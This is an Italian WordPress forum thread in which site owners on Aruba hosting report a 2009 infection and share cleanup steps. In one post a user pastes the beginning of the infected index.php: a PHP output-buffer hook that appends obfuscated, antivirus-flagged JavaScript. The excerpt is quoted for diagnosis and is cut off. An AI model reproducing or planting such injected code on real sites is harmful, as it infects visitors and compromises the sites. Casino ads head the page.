Votate WordPress Italy come Miglior Social Network o Servizio per i Blog ai Macchianera Blog Awards 2010
Noi saremo presenti alla BlogFest 2010
Anche in Italia sono arrivati i casino online: scopri quali sono i migliori casino del web.
Ti piace giocare online? Prova gratuitamente la roulette online ed impara a conoscere i sistemi per roulette di casino2k.com.
aggiornamento articoli aruba blog categorie Commenti CSS database errore feed header immagini installazione link pagina pagine permalink plugin Post problema rss sidebar tag tema temi template utenti widget wordpress wp
Tutto ad un tratto mi ritrovo con 14 blog, tutti aggiornati all'ultima versione 2.8.4 con questo errore.
Fatal error: Cannot redeclare security_update() (previously declared in /web/htdocs/www.nomedominio.com/home/index.php:1) in /web/htdocs/www.nomedominio.com/home/wp-includes/default-filters.php on line 1
Tutti su server Linux Aruba.
Aiuto!
le prove che ti vengono chieste prima di postare che esito hanno dato?
Scusa, hai ragione non ho messo nessuna info riguardo alle prove.
Purtroppo tutto il sito, sia lato admin che utente non è funzionante, dunque non ho possibilità di disattivare plugin o altro.
Facendo una ricerca su Google mi sono anche accorto che milioni di siti presentano lo stesso problema
cancella tutti i plugin via ftp.
uno dice che gli è stato modificato il file index.php, prova a vedere se è uguale a quello originale.
Ho controllato il file index.php, risulta alterato con uno javascript criptato, sicuramente un trojan.
Il ripristino del solo index non serve a nulla.
Comunque siamo davanti ad un grosso bug si sicurezza della versione 2.8.4.
Avevo recentemento aggiornato tutto il network, anche grazie agli avvisi di Wordpress Italia sulle falle di sicurezza delle vecchie versioni
Probabilmente erano già compromessi e ora che hai aggiornato(tardi mi sa) wp blocca tutto.
I bug c'erano nelle vecchie versioni.
per ripristinare cancella tutti i file di wordpress eccetto wp-config.php, htaccess e il tuo tema (che verificherei) e ricarica i file di wp, poi controlla il database per vedere se c'è inserito qualcosa di strano.
Dunque:
Cancellato tutti i file, eccetto wp-config.php, htaccess e il Thema, che dopo un controllo risultano puliti.
Stessa cosa, tutti i plugin risultano puliti da strani script.
Fatto l'upload di una versione appena scaricata di wordpress, il tutto sembra essersi ripristinato.
Da quello che ho potuto notare finora, tutti i file index.php sono stati infettati.
ora verifica anche il database se per esempio ci sono utenti admin a te sconosciuti.
Nel database in 2 dei blog ripuliti non ci sono amministratori oltre a quelli conosciuti.
Preciso che in tutti i file index.php presenti sel server sono tutti infettati, anche in altre applicazioni (in un dominio ho anche applicazioni diverse) che nono sono wordpress.
Ciao ragazzi,
anche a me oggi è successa la stessa cosa verso le 17 due Blog Down
il mio blog principale gira ancora sulla 2.6.5 su Aruba Linux
ecco cosa c'è all'inizio del File Index:
<?php ob_start("security_update"); function security_update($buffer){return $buffer."<script language=\"javascript\">$=\"Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+mfqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0}qwys^e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M0...
Continua ancora per parecchi righi.
Fortunatamente mi sono salvato grazie al Backup giornaliero o ripristinato il file index del giorno precedente ed il Blog è ritornato Up.
Al momento sono riuscito ad individuare due File Infetti l'index e il default-filters.php, non ho avuto ancora il tempo di controllare gli altri file, lo farò domani.
Nel frattempo come possiamo difenderci visto che anche l'ultima versione è stata bucata ed a quanto pare anche tutte le altre versioni lo stesso.
Grazie mille per l'assistenza.
Wolly per capire se il database è anch'esso compromesso da cosa lo posso capire ???
Cioè oltre ad altri utenti sconosciuti cosa potrebbe esserci per capire se il DB è integro ???
@zeroita a questo punto verifica il server se tutti sono stati hackerati devi verificre molto bene il tutto.
@gigihouse possono essere molte cose, la prima la presenza di un utente admin che tu nn conosci.
Riassumendo:
Sono 14 blog tutti ospitati su server Aruba (spazio base) dunque non hanno nessuna attinenza fra loro.
Come possiamo spiegare un simile fenomeno ed inoltre tutti i blog sono stati attaccati contemporaneamente nell'arco di alcune ore?
Se wordpress non è bucato... possiamo ipotizzare un attacco al server di Aruba?
Preciso che tutti i blog hanno subito un aggiornamento automatico alla versione 2.8.4.
Come detto, centinaia di blog hanno lo stesso problema, basta effettuare una ricerca su Google.
Aggingo ancora che ogni qualvolta scarico in locale un file infettato, viene bloccato dall'antivirus Kaspesky, rilevando Trojan.JS.Pakes.bh
Per quanto riguarda i Blog che gestisco quelli attaccati sono tutti su Aruba, ma non tutti sono andati down uno è rimasto immune.
Potrebbe essere veritiera l'ipotesi di qualche attacco sui server Aruba, ma come al solito Aruba non da comunicazioni al riguardo.
I blog colpiti è vero ne sono tanti, bisogna capire la causa scatenante....
Dopo apro un Ticket di assistenza su Aruba così vedo un po che mi rispondono.
@Wolly: nel database ho controllato ma non vi è la presenza di nessun admin non autorizzato o altri tipi di utenti.
Oltre a ciò non avendo molto dimestichezza con i DataBase non saprei dove guardare per capire se è integro o meno....
Salve ragazzi idem oggi lo stesso problema tutti i blog ospitati su aruba sono infetti. Pulisco tutto quello che c'è da pulire e ripristino ?
Tutti i miei siti puntavano a trjan.
Ieri ho analizzato tutti i File di WordPress e anche quelli del Tema, gli unici file infetti sono gli index.php quello nella Directory Principale, quello in wp-admin, quello in wp-content e in wp-includes.
Fortunatamente avendo il backup giornaliero e settimanale ho ripristinato tutti i file non infetti è li ho ricaricati tramite ftp.
Nel mio caso il tema non ha subito infezioni, ma solo wordpress ed in particolare nei file che ho segnalato.
Al momento è tutto pulito, ma resta da capire se questo tipo di attacco potrà essere sferrato in qualsiasi altro momento...
Finito di ripristinare tutti i miei blog.
Anche secondo me il problema deriva da un attacco ai server Aruba, ho aperto un ticket, ma non penso che mi risponderanno dicendomi cha hanno beccatto un virus.
I file trovati infetti non sono solo tutti gli index (salvi tutti i templates) ma anche altri files sia con estensione html che php (per lo più piccole applicazioni che tenevo nei server)
Per pulire il tutto, dopo aver effettuato diversi riscontri, ho eliminato e controllato tutti i files con data di modifica 01/10/2009 che ovviamente erano tutti infetti, anche le cartelle con data modifica 01/10/2009 contenevano all'interno files infetti.
Riepilogo:
- backup file .htaccess e wp-config.php
- cancellazione totale dei files infetti (si presentano tutti con data 01/10/2009 - data infezione sui miei blog).
- cancellazione totale cartelle wp-admin e wp-includes
- upload ftp di una versione pulita di Wordpress 2.8.4
A questo punto il tutto risulta regolare, con database apparentemente non infetto e nessun admin non conosciuto.
Spero che possa essere di aiuto.
Gigihouse e ZEroita togliamoci questa curiosità l'ip del server è : 62.149.140.150 ?
Il primo Blog è 62.149.150.80
il secondo è 62.149.150.88
Rdemption a questo punto i server infattati protrebbero essere parecchi, attendiamo qualche comunicazione da Aruba.
Mi hanno telefonato quelli di Aruba chiedendomi se volevo cambiare pwd di accesso a domini e sql, hanno detto che il problema non dipende da loro ma potrebbe esserci stato un furto di dati per colpa nostra o per bug del cms, alche io ho chiesto come mai si era proposto questo problema solo sui loro server, il tizio non mi ha saputo rispondere perché non era un tecnico. Come giustamente avete affermato non possono dire che il problema è loro... ma neanche dirci che c'è stato un furto di dati...
- backup file .htaccess e wp-config.php
- cancellazione totale dei files infetti (si presentano tutti con data 01/10/2009 - data infezione sui miei blog).
- cancellazione totale cartelle wp-admin e wp-includes
- upload ftp di una versione pulita di Wordpress 2.8.4
allora sono arrivato a uplodare la nuova versione, ma devo recuperare tutto il vekkio datavese, come faccio?
ciao ragazzi, pure io sono stato vittima dell'errore riportato nella pagina precedente, per ben 2 mattine di fila! sempre intorno alle 11.
oltre a provare la strada dell'aggiornamento di wp ed effettuare le giuste pulizie, non si possono modificare i permessi dei files index? non ne capisco molto ma ho letto che tra .htaccess e permessi (differenti da 755) si può mettere una toppa.
sapete se è una cosa fattibile?
grazie a tutti :)
Miki
Allora, proprio in questi giorni stesso problema, più volte al giorno nella sola pagina index.html mi si crea da solo uno script java che l'antivirus lo rileva, lo stesso dell'amico che ha aperto questo 3d, Reinvio la pagina pulita salvata e dopo qualche tempo (non sempre lo stesso) lo scipt ricompare di nuovo.
preciso:
1) anche il mio sito è su Aruba
2) non ho pagine php, ma nel server ho solo pagine da me create in html
3) non ci sono file del tipo js o java o altro, niente di niente
4) ho tolto il contatore visite
5) ho cambiato il nome della index in default.html e non è servito a niente
6) ho tentato di modificare i permessi, ma è impossibile
7) non esistono banner o altre cose richiamate attraverso iframe o altre diavolerie
8) insomma, tutto lindo e pulito
credendo che scrivere all'assistenza sia inutile, ho pensato io stesso stamani di richiedere il cambio password, cosa che è stata modificata un'ora fa, e per ora .... tutto tace e spero per sempre. L'idea di cambiare la password mi è venuta pensando che, possibile che reinvio la pagina pulita e non viene infettata subito ma, a volte dopo 30 minuti, a volte dopo 1 ora e a volte dopo 10 ore, proprio come se qualcuno inserisse il maledetto script manualmente.
Che ne pensate?
PS: Un saluto a tutti, questo è il mio 1° post
ciao ragazzi, ho avuto lo stesso vostro problema e ho appena risolto
cosa posso fare per evitare che accada di nuovo?
Devo chiedere alla fattucchiera; cioè quella che mi da le soluzioni dei problemi di chi posta senza dare alcuna indicazione (versione wp, host, tema, ecc.), se è disposta a fare degli amuleti?
Devi aver fatto il login per poter pubblicare articoli.